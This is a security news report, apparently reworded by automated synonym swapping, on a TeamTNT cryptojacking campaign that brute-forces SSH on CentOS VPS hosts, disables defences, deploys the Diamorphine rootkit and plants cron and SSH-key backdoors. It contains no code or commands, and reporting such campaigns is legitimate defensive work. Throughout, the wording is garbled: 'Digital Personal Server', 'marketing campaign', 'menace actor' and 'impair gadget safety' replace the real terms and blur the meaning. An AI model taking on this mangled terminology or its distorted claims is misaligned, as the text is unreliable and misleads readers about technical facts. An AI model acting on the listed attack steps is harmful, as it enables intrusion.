The cryptojacking operation generally known as TeamTNT has doubtless resurfaced as a part of a brand new marketing campaign focusing on Digital Personal Server (VPS) infrastructures primarily based on the CentOS working system.
“The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim’s assets, during which the threat actor uploaded a malicious script,” Group-IB researchers Vito Alfano and Nam Le Phuong stated in a Wednesday report.
The malicious script, the Singaporean cybersecurity firm famous, is chargeable for disabling security measures, deleting logs, terminating cryptocurrency mining processes, and inhibiting restoration efforts.
The assault chains finally pave the best way for the deployment of the Diamorphine rootkit to hide malicious processes, whereas additionally establishing persistent distant entry to the compromised host.
The marketing campaign has been attributed to TeamTNT with reasonable confidence, citing similarities within the techniques, methods, and procedures (TTPs) noticed.
TeamTNT was first found within the wild in 2019, endeavor illicit cryptocurrency mining actions by infiltrating cloud and container environments. Whereas the menace actor bid farewell in November 2021 by asserting a “clean quit,” public reporting has uncovered a number of campaigns undertaken by the hacking crew since September 2022.
The newest exercise linked to the group manifests within the type of a shell script that first checks if it was beforehand contaminated by different cryptojacking operations, after which it precedes to impair gadget safety by disabling SELinux, AppArmor, and the firewall.
 |
| Adjustments carried out on ssh service |
“The script searches for a daemon related to the cloud provider Alibaba, named aliyun.service,” the researchers stated. “If it detects this daemon, it downloads a bash script from update.aegis.aliyun.com to uninstall the service.”
Moreover killing all competing cryptocurrency mining processes, the script takes steps to execute a sequence of instructions to take away traces left by different miners, terminate containerized processes, and take away pictures deployed in reference to any coin miners.
Moreover, it establishes persistence by configuring cron jobs that obtain the shell script each half-hour from a distant server (65.108.48[.]150) and modifying the “/root/.ssh/authorized_keys” file so as to add a backdoor account.
“It locks down the system by modifying file attributes, creating a backdoor user with root access, and erasing command history to hide its activities,” the researchers famous. “The threat actor leaves nothing to chance; indeed, the script implements various changes within the SSH and firewall service configuration.”
